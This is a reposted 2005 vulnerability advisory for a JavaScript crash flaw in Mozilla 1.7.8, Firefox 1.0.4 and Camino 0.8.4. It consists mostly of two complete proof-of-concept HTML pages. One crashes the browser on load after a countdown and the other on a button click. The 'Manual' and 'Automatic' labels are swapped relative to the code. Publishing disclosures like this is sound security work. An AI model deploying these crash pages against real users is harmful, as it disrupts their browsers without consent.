文章作者:Paul Kurczaba
Vendor:
Mozilla (
http://www.mozilla.org)
Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4
Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to
crash the above named browsers. The script can be executed both with and
without user intervention.
Proof of Concept:
Manual:
http://www.kurczaba.com/html/security/0506241_poc.htm复制内容到剪贴板
代码:
<!--
Mozilla Multiple Product JavaScript Issue: Proof-of-Concept 2
Discovered by Paul Kurczaba
-->
<html>
<head>
<title>Mozilla Multiple Product JavaScript Issue: Proof-of-Concept 2</title>
</head>
<body>
<form name="Form1" action="javascript:CrashFirefox();">
<fieldset style="border: 2px solid #808080; padding: 2px">
<legend>
<span style="font-weight: 700">
<font face="Trebuchet MS" size="2" color="#333333">Mozilla Multiple Product JavaScript Issue: Proof-of-Concept
2 - Automatic</font></span></legend>
<table border="0" width="100%" cellspacing="0" cellpadding="0" id="table1">
<tr>
<td width="6"> </td>
<td><font face="Trebuchet MS" size="2" color="#333333">This
Proof-of-concept code will
crash the following Mozilla products:<br>
-Mozilla 1.7.8<br>
-Firefox 1.0.4<br>
-Camino 0.8.4<br>
<br>
Your browser (if a Mozilla Product) will crash in
<input type="text" name="textcountdown" size="1" style="border: 0px solid #FFFFFF; ; font-family:Trebuchet MS; font-size:10pt; color:#333333; vertical-align:text-bottom"></a>seconds.<br>
</font></td>
</tr>
</table>
</fieldset>
</form>
<script language="JavaScript">
var second = 6
document.Form1.textcountdown.value = 6
function countdown()
{
if (second > 1){
second = second -1
document.Form1.textcountdown.value=second
}
else
{
//Run the function 20000 times
for (a = 0; a <= 20000; a++)
{
//Here is the special code that terminates the browser
function(){};
}
//Displays an alert to notify the user if the browser is not vulnerable.
alert("Good news - Your browser is not vulnerable.");
return
}
setTimeout("countdown()",1000)
}
countdown()
</script>
</body>
</html>Automatic:
http://www.kurczaba.com/html/security/0506241_poc2.htm复制内容到剪贴板
代码:
<!--
Mozilla Multiple Product JavaScript Issue: Proof-of-Concept
Discovered by Paul Kurczaba
-->
<html>
<head>
<title>Mozilla Multiple Product JavaScript Issue: Proof-of-Concept</title>
</head>
<body>
<form name="Form1" action="javascript:CrashFirefox();">
<fieldset style="border: 2px solid #808080; padding: 2px">
<legend>
<span style="font-weight: 700">
<font face="Trebuchet MS" size="2" color="#333333">Mozilla Multiple Product JavaScript
Issue: Proof-of-Concept 1 - Manual</font></span></legend>
<table border="0" width="100%" cellspacing="0" cellpadding="0" id="table1">
<tr>
<td width="6"> </td>
<td><font face="Trebuchet MS" size="2" color="#333333">This
Proof-of-concept code will
crash the following Mozilla products:<br>
-Mozilla 1.7.8<br>
-Firefox 1.0.4<br>
-Camino 0.8.4<br>
<br>
To execute the Proof-of-concept code, click on the button.<br>
<br>
<input type="submit" value=" Go " name="ButtonStart" style="font-family: Trebuchet MS; font-size: 10pt; color: #333333; text-decoration:none"></a><br>
</font></td>
</tr>
</table>
</fieldset>
</form>
<script language="JavaScript">
//Our function that is called from clicking the button
function CrashFirefox()
{
//Run the function 20000 times
for (a = 0; a <= 20000; a++)
{
//Here is the special code that terminates the browser
function(){};
}
//Displays an alert to notify the user if the browser is not vulnerable.
alert("Good news - Your browser is not vulnerable.");
}
</script>
</body>
</html>Workaround:
Disable JavaScript
Date Discovered:
June 14, 2005
Severity:
Low
Credit:
Paul Kurczaba
